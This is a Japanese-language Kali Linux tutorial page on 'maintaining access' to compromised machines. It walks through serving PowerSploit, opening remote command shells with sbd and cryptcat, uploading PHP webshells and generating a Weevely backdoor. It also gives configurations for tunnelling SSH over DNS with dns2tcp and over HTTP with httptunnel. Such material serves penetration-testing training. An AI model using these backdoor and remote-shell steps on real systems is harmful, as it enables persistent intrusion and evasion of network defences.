Kali-linux-maintaining-access

提供:Dev Guides
移動先:案内検索

Kali Linux-アクセスの維持

この章では、Kaliが接続を維持し、ハッキングされたマシンが再び接続および切断された場合でも、ハッキングされたマシンへのアクセスに使用するツールについて説明します。

Powersploit

これは、Windowsマシン用のツールです。 被害者のマシンにPowerShellがインストールされています。 このツールは、ハッカーがPowerShellを介して被害者のマシンに接続するのに役立ちます。

それを開くには、左側の端末を開き、次のコマンドを入力してpowersploitフォルダーに入ります-

cd/usr/share/powersploit/
  • 「ls」*と入力すると、アクセスして被害者のマシンにダウンロードしてインストールできるすべてのpowersploitツールがリストされます。 それらのほとんどは、名前に応じて自己説明された名前です。

Powersploit

被害者のマシンにこのツールをダウンロードする簡単な方法は、Webサーバーを作成することです。これにより、powersploitツールは次のコマンドを使用して簡単に作成できます-

python -m SimpleHTTPServer

ダウンロードツール

この後、「http://<Kali machine ip_address>:8000/」と入力すると、次のようになります。

Directory Listimg

Sbd

sbdはNetcatに似たツールです。 移植性があり、LinuxおよびMicrosoftマシンで使用できます。 sbdはAES-CBC-128 + HMAC-SHA1暗号化を備えています>基本的に、特定のポートでいつでも被害者のマシンに接続し、リモートでコマンドを送信するのに役立ちます。

それを開くには、ターミナルに移動し、サーバーが接続を受け入れるように*“ sbd -l -p port” *と入力します。

接続受け入れ

この場合、サーバーがリッスンするポート44を配置します。

ケースポート

被害者のサイトで、*「sbd IPofserver port」*と入力します。 リモートコマンドを送信できる接続が確立されます。

この場合、同じマシンでテストを実行したため、「localhost」です。

Ipofserver

最後に、サーバーで次のスクリーンショットに示すように接続が発生したことがわかります。

サーバー接続

ウェブシェル

Webshel​​lは、アクセスを維持したり、Webサイトをハッキングするために使用できます。 しかし、それらのほとんどはアンチウイルスによって検出されます。 C99 phpシェルは、ウイルス対策プログラムでよく知られています。 一般的なアンチウイルスは、マルウェアとして簡単に検出します。

通常、それらの主な機能は、Webインターフェイスを介してシステムコマンドを送信することです。

それを開き、ターミナルで _“ cd/usr/share/webshel​​ls/” _ と入力します。

Webshel​​l

ご覧のとおり、それらはプログラミング言語に応じてクラスに分割されています:asp、aspx、cfm、jsp、perl、php

PHPフォルダーに入力すると、PHP WebページのすべてのWebシェルを表示できます。

フォルダー

シェルをWebサーバーにアップロードするには、たとえば*“ simple-backdoor.php” *でWebページとWebシェルのURLを開きます。

最後に、cmdコマンドを作成します。 次のスクリーンショットのように、すべての情報が表示されます。

コマンドの書き込み

ウィーブリー

Weevelyは、telnetのような接続をシミュレートするPHP Webシェルです。 これは、悪用されたWebアプリケーション用のツールであり、ステルスバックドアとして、または正当なWebアカウントを管理するWebシェルとして使用できます。

開くには、ターミナルに移動して「weevely」と入力し、使用状況を確認します。

Weevely

シェルを生成するには、*「weebly generate password pathoffile」*と入力します。 次のスクリーンショットに示すように、「デスクトップ」フォルダーに生成され、ファイルをWebサーバーにアップロードしてアクセスできるようにします。

シェルの生成

次のスクリーンショットに示すようにWebシェルをアップロードした後、セッションが開始されたことを確認できるコマンド*「weevely URL password」*を使用して、cmdでサーバーに接続できます。

ファイルのアップロード

http-tunnel

http-tunnelは、HTTP要求でトンネリングされる双方向の仮想データストリームを作成します。 必要に応じて、HTTPプロキシ経由でリクエストを送信できます。 これは、制限されたファイアウォールの背後にいるユーザーに役立ちます。 HTTPプロキシを介したWWWアクセスが許可されている場合、http-tunnelとtelnetまたはPPPを使用してファイアウォールの外側のコンピューターに接続できます。

まず、次のコマンドでトンネルサーバーを作成する必要があります-

httptunnel_server –h

次に、クライアントサイトで*“ httptunnel_client –h” *と入力すると、両方が接続の受け入れを開始します。

dns2tcp

これも、UDP 53ポートを意味するDNSトラフィックを介してTCPトラフィックを渡すのに役立つトンネリングツールです。

開始するには、*“ dns2tcpd” *と入力します。 スクリプトを開くときに使用方法が説明されます。

DNSTcp

サーバーサイトでこのコマンドを入力して、ファイルを構成します。

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot =/root/dns2tcp
pid_file =/var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc

クライアントサイトで、このコマンドを入力します。

# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076

このコマンドでトンネリングが開始されます。

クリプトキャット

これは、暗号化された方法で被害者のマシンとTCPおよびUDP接続を確立できるNetcatのような別のツールです。

サーバーを起動して接続をリッスンするには、次のコマンドを入力します-

cryptcat –l –p port –n

cryptcat

どこで、

  • -l は接続を聞くことを意味します
  • -p はポート番号パラメーターを表します
  • -n は名前解決を行わないことを意味します

クライアントサイトでは、接続コマンドは*「cryptcat IPofServer PortofServer」*です

サーバーのポート